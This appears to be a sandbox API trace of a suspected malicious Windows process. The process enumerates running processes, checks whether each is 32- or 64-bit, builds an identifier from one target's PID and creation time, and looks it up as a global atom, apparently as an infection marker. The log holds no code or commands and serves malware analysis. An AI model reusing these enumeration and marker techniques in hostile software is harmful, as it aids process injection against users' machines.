	[0074.125] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x7721a0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0074.126] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x224
	[0074.126] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.126] CloseHandle (hObject=0x224) returned 1
	[0074.126] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ShellExperienceHost.exe", cchWideChar=23, lpMultiByteStr=0x728978, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ShellExperienceHost.exe", lpUsedDefaultChar=0x0) returned 23
	[0074.126] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x224
	[0074.126] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.126] CloseHandle (hObject=0x224) returned 1
	[0074.126] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SearchUI.exe", cchWideChar=12, lpMultiByteStr=0x7721a0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SearchUI.exe", lpUsedDefaultChar=0x0) returned 12
	[0074.126] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x224
	[0074.126] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.126] CloseHandle (hObject=0x224) returned 1
	[0074.126] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dllhost.exe", cchWideChar=11, lpMultiByteStr=0x7721d0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dllhost.exe", lpUsedDefaultChar=0x0) returned 11
	[0074.126] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0074.126] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="audiodg.exe", cchWideChar=11, lpMultiByteStr=0x7721a0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="audiodg.exe", lpUsedDefaultChar=0x0) returned 11
	[0074.126] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x224
	[0074.126] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.126] CloseHandle (hObject=0x224) returned 1
	[0074.127] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x7721d0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0074.127] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x224
	[0074.127] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.127] CloseHandle (hObject=0x224) returned 1
	[0074.127] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772218, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0074.127] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x224
	[0074.127] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.127] CloseHandle (hObject=0x224) returned 1
	[0074.127] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="backgroundTaskHost.exe", cchWideChar=22, lpMultiByteStr=0x728a98, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="backgroundTaskHost.exe", lpUsedDefaultChar=0x0) returned 22
	[0074.127] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xddc) returned 0x0
	[0074.127] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="taskhostw.exe", cchWideChar=13, lpMultiByteStr=0x772158, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 13
	[0074.127] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x224
	[0074.127] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.127] CloseHandle (hObject=0x224) returned 1
	[0074.127] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="develop-patent.exe", cchWideChar=18, lpMultiByteStr=0x728838, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="develop-patent.exe", lpUsedDefaultChar=0x0) returned 18
	[0074.127] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x224
	[0074.127] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.127] CloseHandle (hObject=0x224) returned 1
	[0074.128] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="its.exe", cchWideChar=7, lpMultiByteStr=0x72dd60, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="its.exe", lpUsedDefaultChar=0x0) returned 7
	[0074.128] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x224
	[0074.128] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.128] CloseHandle (hObject=0x224) returned 1
	[0074.128] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="gently budapest.exe", cchWideChar=19, lpMultiByteStr=0x7287f8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gently budapest.exe", lpUsedDefaultChar=0x0) returned 19
	[0074.128] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x224
	[0074.128] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.128] CloseHandle (hObject=0x224) returned 1
	[0074.128] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="thoroughlypriestprefix.exe", cchWideChar=26, lpMultiByteStr=0x72eb08, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="thoroughlypriestprefix.exe", lpUsedDefaultChar=0x0) returned 26
	[0074.128] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x224
	[0074.128] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.128] CloseHandle (hObject=0x224) returned 1
	[0074.128] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="inserted_field.exe", cchWideChar=18, lpMultiByteStr=0x728978, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="inserted_field.exe", lpUsedDefaultChar=0x0) returned 18
	[0074.128] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x224
	[0074.128] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.128] CloseHandle (hObject=0x224) returned 1
	[0074.128] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="semi bay.exe", cchWideChar=12, lpMultiByteStr=0x772200, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="semi bay.exe", lpUsedDefaultChar=0x0) returned 12
	[0074.128] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x224
	[0074.128] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.129] CloseHandle (hObject=0x224) returned 1
	[0074.129] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="outdoor.exe", cchWideChar=11, lpMultiByteStr=0x772170, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="outdoor.exe", lpUsedDefaultChar=0x0) returned 11
	[0074.129] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x224
	[0074.129] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.129] CloseHandle (hObject=0x224) returned 1
	[0074.129] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wool-parish-horses.exe", cchWideChar=22, lpMultiByteStr=0x7287f8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wool-parish-horses.exe", lpUsedDefaultChar=0x0) returned 22
	[0074.129] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x224
	[0074.129] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.129] CloseHandle (hObject=0x224) returned 1
	[0074.129] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoken-delayed.exe", cchWideChar=18, lpMultiByteStr=0x7287f8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoken-delayed.exe", lpUsedDefaultChar=0x0) returned 18
	[0074.129] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x224
	[0074.129] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.129] CloseHandle (hObject=0x224) returned 1
	[0074.129] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spokesman.exe", cchWideChar=13, lpMultiByteStr=0x7721d0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spokesman.exe", lpUsedDefaultChar=0x0) returned 13
	[0074.129] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x224
	[0074.129] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.129] CloseHandle (hObject=0x224) returned 1
	[0074.130] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="oxide.exe", cchWideChar=9, lpMultiByteStr=0x772200, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="oxide.exe", lpUsedDefaultChar=0x0) returned 9
	[0074.130] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x224
	[0074.130] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.130] CloseHandle (hObject=0x224) returned 1
	[0074.130] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="off-covered-playlist.exe", cchWideChar=24, lpMultiByteStr=0x72e798, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="off-covered-playlist.exe", lpUsedDefaultChar=0x0) returned 24
	[0074.130] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x224
	[0074.130] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.130] CloseHandle (hObject=0x224) returned 1
	[0074.130] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bryant.exe", cchWideChar=10, lpMultiByteStr=0x772200, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bryant.exe", lpUsedDefaultChar=0x0) returned 10
	[0074.130] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x224
	[0074.130] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.130] CloseHandle (hObject=0x224) returned 1
	[0074.130] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="postal-fool.exe", cchWideChar=15, lpMultiByteStr=0x772170, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="postal-fool.exe", lpUsedDefaultChar=0x0) returned 15
	[0074.130] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x224
	[0074.130] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.130] CloseHandle (hObject=0x224) returned 1
	[0074.130] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="crm_remarks_ctrl.exe", cchWideChar=20, lpMultiByteStr=0x7288b8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="crm_remarks_ctrl.exe", lpUsedDefaultChar=0x0) returned 20
	[0074.130] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x224
	[0074.130] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.131] CloseHandle (hObject=0x224) returned 1
	[0074.131] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="volunteer.exe", cchWideChar=13, lpMultiByteStr=0x772158, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="volunteer.exe", lpUsedDefaultChar=0x0) returned 13
	[0074.131] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x224
	[0074.131] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.131] CloseHandle (hObject=0x224) returned 1
	[0074.131] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ranger_tu_community.exe", cchWideChar=23, lpMultiByteStr=0x728a98, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ranger_tu_community.exe", lpUsedDefaultChar=0x0) returned 23
	[0074.131] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x224
	[0074.131] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.131] CloseHandle (hObject=0x224) returned 1
	[0074.131] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="eddie_cholesterol_reprint.exe", cchWideChar=29, lpMultiByteStr=0x72ea18, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eddie_cholesterol_reprint.exe", lpUsedDefaultChar=0x0) returned 29
	[0074.131] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x224
	[0074.131] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.131] CloseHandle (hObject=0x224) returned 1
	[0074.131] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bracket-natural-chancellor.exe", cchWideChar=30, lpMultiByteStr=0x72e8d8, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bracket-natural-chancellor.exe", lpUsedDefaultChar=0x0) returned 30
	[0074.131] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x224
	[0074.131] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.131] CloseHandle (hObject=0x224) returned 1
	[0074.131] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="safari.exe", cchWideChar=10, lpMultiByteStr=0x7721b8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="safari.exe", lpUsedDefaultChar=0x0) returned 10
	[0074.132] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x224
	[0074.132] GetLastError () returned 0x5
	[0074.132] GetLastError () returned 0x5
	[0074.132] GetLastError () returned 0x5
	[0074.132] GetLastError () returned 0x5
	[0074.132] GetLastError () returned 0x5
	[0074.132] GetLastError () returned 0x5
	[0074.132] GetLastError () returned 0x5
	[0074.132] GetLastError () returned 0x5
	[0074.132] GetLastError () returned 0x5
	[0074.132] GetLastError () returned 0x5
	[0074.132] GetLastError () returned 0x5
	[0074.132] GetLastError () returned 0x5
	[0074.132] GetLastError () returned 0x5
	[0074.132] GetLastError () returned 0x5
	[0074.132] GetLastError () returned 0x5
	[0074.132] GetLastError () returned 0x5
	[0074.132] GetLastError () returned 0x5
	[0074.132] GetLastError () returned 0x5
	[0074.132] GetLastError () returned 0x5
	[0074.132] GetLastError () returned 0x5
	[0074.132] GetLastError () returned 0x5
	[0074.132] GetLastError () returned 0x5
	[0074.132] GetLastError () returned 0x5
	[0074.132] GetLastError () returned 0x5
	[0074.132] GetLastError () returned 0x5
	[0074.132] GetLastError () returned 0x5
	[0074.132] GetLastError () returned 0x5
	[0074.132] GetLastError () returned 0x5
	[0074.132] GetLastError () returned 0x5
	[0074.132] GetLastError () returned 0x5
	[0074.132] GetLastError () returned 0x5
	[0074.132] GetLastError () returned 0x5
	[0074.132] GetLastError () returned 0x5
	[0074.132] GetLastError () returned 0x5
	[0074.132] GetLastError () returned 0x5
	[0074.132] GetLastError () returned 0x5
	[0074.132] GetLastError () returned 0x5
	[0074.132] GetLastError () returned 0x5
	[0074.132] GetLastError () returned 0x5
	[0074.132] GetLastError () returned 0x5
	[0074.132] GetLastError () returned 0x5
	[0074.132] GetLastError () returned 0x5
	[0074.132] GetLastError () returned 0x5
	[0074.132] GetLastError () returned 0x5
	[0074.132] GetLastError () returned 0x5
	[0074.132] GetLastError () returned 0x5
	[0074.132] GetLastError () returned 0x5
	[0074.133] GetLastError () returned 0x5
	[0074.133] GetLastError () returned 0x5
	[0074.133] GetLastError () returned 0x5
	[0074.133] GetLastError () returned 0x5
	[0074.133] GetLastError () returned 0x5
	[0074.133] GetLastError () returned 0x5
	[0074.133] GetLastError () returned 0x5
	[0074.133] GetLastError () returned 0x5
	[0074.133] GetLastError () returned 0x5
	[0074.133] GetLastError () returned 0x5
	[0074.133] GetLastError () returned 0x5
	[0074.133] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0074.133] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0074.133] GetProcessTimes (in: hProcess=0x224, lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4 | out: lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4) returned 1
	[0074.133] GetLastError () returned 0x5
	[0074.133] GetLastError () returned 0x5
	[0074.133] GetLastError () returned 0x5
	[0074.133] GetLastError () returned 0x5
	[0074.133] GetLastError () returned 0x5
	[0074.133] GetLastError () returned 0x5
	[0074.133] GetLastError () returned 0x5
	[0074.133] GetLastError () returned 0x5
	[0074.133] GetLastError () returned 0x5
	[0074.133] GetLastError () returned 0x5
	[0074.133] GetLastError () returned 0x5
	[0074.133] GetLastError () returned 0x5
	[0074.133] GetLastError () returned 0x5
	[0074.133] GetLastError () returned 0x5
	[0074.133] GetLastError () returned 0x5
	[0074.133] GetLastError () returned 0x5
	[0074.133] GetLastError () returned 0x5
	[0074.133] GetLastError () returned 0x5
	[0074.133] GetLastError () returned 0x5
	[0074.133] GetLastError () returned 0x5
	[0074.133] GetLastError () returned 0x5
	[0074.133] GetLastError () returned 0x5
	[0074.134] GetLastError () returned 0x5
	[0074.134] GetLastError () returned 0x5
	[0074.134] GetLastError () returned 0x5
	[0074.134] GetLastError () returned 0x5
	[0074.134] wsprintfA (in: param_1=0x770458, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0074.134] GetLastError () returned 0x5
	[0074.134] GetLastError () returned 0x5
	[0074.134] GetLastError () returned 0x5
	[0074.134] GetLastError () returned 0x5
	[0074.134] GetLastError () returned 0x5
	[0074.134] GetLastError () returned 0x5
	[0074.134] GetLastError () returned 0x5
	[0074.134] GetLastError () returned 0x5
	[0074.134] GetLastError () returned 0x5
	[0074.134] GetLastError () returned 0x5
	[0074.134] GetLastError () returned 0x5
	[0074.134] GetLastError () returned 0x5
	[0074.134] GetLastError () returned 0x5
	[0074.134] GetLastError () returned 0x5
	[0074.134] GetLastError () returned 0x5
	[0074.134] GetLastError () returned 0x5
	[0074.134] GetLastError () returned 0x5
	[0074.134] GetLastError () returned 0x5
	[0074.134] GetLastError () returned 0x5
	[0074.134] GetLastError () returned 0x5
	[0074.134] GetLastError () returned 0x5
	[0074.134] GetLastError () returned 0x5
	[0074.134] GetLastError () returned 0x5
	[0074.134] GetLastError () returned 0x5
	[0074.134] GetLastError () returned 0x5
	[0074.134] GetLastError () returned 0x5
	[0074.134] GetLastError () returned 0x5
	[0074.134] GetLastError () returned 0x5
	[0074.134] GetLastError () returned 0x5
	[0074.134] GetLastError () returned 0x5
	[0074.134] GetLastError () returned 0x5
	[0074.134] GetLastError () returned 0x5
	[0074.134] GetLastError () returned 0x5
	[0074.134] GetLastError () returned 0x5
	[0074.134] GetLastError () returned 0x5
	[0074.134] GetLastError () returned 0x5
	[0074.134] GetLastError () returned 0x5
	[0074.134] GetLastError () returned 0x5
	[0074.134] GetLastError () returned 0x5
	[0074.134] GetLastError () returned 0x5
	[0074.134] GetLastError () returned 0x5
	[0074.134] GetLastError () returned 0x5
	[0074.134] GetLastError () returned 0x5
	[0074.134] GetLastError () returned 0x5
	[0074.134] GetLastError () returned 0x5
	[0074.134] GetLastError () returned 0x5
	[0074.134] GetLastError () returned 0x5
	[0074.134] GetLastError () returned 0x5
	[0074.134] GetLastError () returned 0x5
	[0074.135] GetLastError () returned 0x5
	[0074.135] GetLastError () returned 0x5
	[0074.135] GetLastError () returned 0x5
	[0074.135] GetLastError () returned 0x5
	[0074.135] GetLastError () returned 0x5
	[0074.135] GetLastError () returned 0x5
	[0074.135] GetLastError () returned 0x5
	[0074.135] GetLastError () returned 0x5
	[0074.135] GetLastError () returned 0x5
	[0074.135] GetLastError () returned 0x5
	[0074.135] GetLastError () returned 0x5
	[0074.135] GetLastError () returned 0x5
	[0074.135] GetLastError () returned 0x5
	[0074.135] GetLastError () returned 0x5
	[0074.135] GetLastError () returned 0x5
	[0074.135] GetLastError () returned 0x5
	[0074.135] GetLastError () returned 0x5
	[0074.135] GetLastError () returned 0x5
	[0074.135] GetLastError () returned 0x5
	[0074.135] GetLastError () returned 0x5
	[0074.135] GetLastError () returned 0x5
	[0074.135] GetLastError () returned 0x5
	[0074.135] GetLastError () returned 0x5
	[0074.135] GetLastError () returned 0x5
	[0074.135] GetLastError () returned 0x5
	[0074.135] GetLastError () returned 0x5
	[0074.135] GetLastError () returned 0x5
	[0074.135] GetLastError () returned 0x5
	[0074.135] GetLastError () returned 0x5
	[0074.135] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0074.135] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0074.135] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0074.135] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0074.136] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc000
	[0074.136] CloseHandle (hObject=0x224) returned 1
	[0074.136] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbf0) returned 0x0
	[0074.136] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WmiPrvSE.exe", cchWideChar=12, lpMultiByteStr=0x772188, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WmiPrvSE.exe", lpUsedDefaultChar=0x0) returned 12
	[0074.136] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x37c) returned 0x224
	[0074.136] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.136] CloseHandle (hObject=0x224) returned 1
	[0074.136] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="LocationNotificationWindows.exe", cchWideChar=31, lpMultiByteStr=0x72e8b0, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LocationNotificationWindows.exe", lpUsedDefaultChar=0x0) returned 31
	[0074.136] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x940) returned 0x0
	[0074.136] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721b8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0074.136] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdb8) returned 0x224
	[0074.136] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.136] CloseHandle (hObject=0x224) returned 1
	[0074.136] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SMSvcHost32.exe", cchWideChar=15, lpMultiByteStr=0x772158, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SMSvcHost32.exe", lpUsedDefaultChar=0x0) returned 15
	[0074.167] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x27eff10 | out: SystemInformation=0x0, ResultLength=0x27eff10*=0x16e08) returned 0xc0000004
	[0074.168] VirtualAlloc (lpAddress=0x0, dwSize=0x16f08, flAllocationType=0x3000, flProtect=0x4) returned 0x2bb0000
	[0074.168] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2bb0000, Length=0x16f08, ResultLength=0x0 | out: SystemInformation=0x2bb0000, ResultLength=0x0) returned 0x0
	[0074.170] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0074.170] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="smss.exe", cchWideChar=8, lpMultiByteStr=0x772188, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="smss.exe", lpUsedDefaultChar=0x0) returned 8
	[0074.170] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0074.170] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x772158, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0074.170] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0074.170] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wininit.exe", cchWideChar=11, lpMultiByteStr=0x7721a0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wininit.exe", lpUsedDefaultChar=0x0) returned 11
	[0074.170] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0074.170] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x772188, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0074.170] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
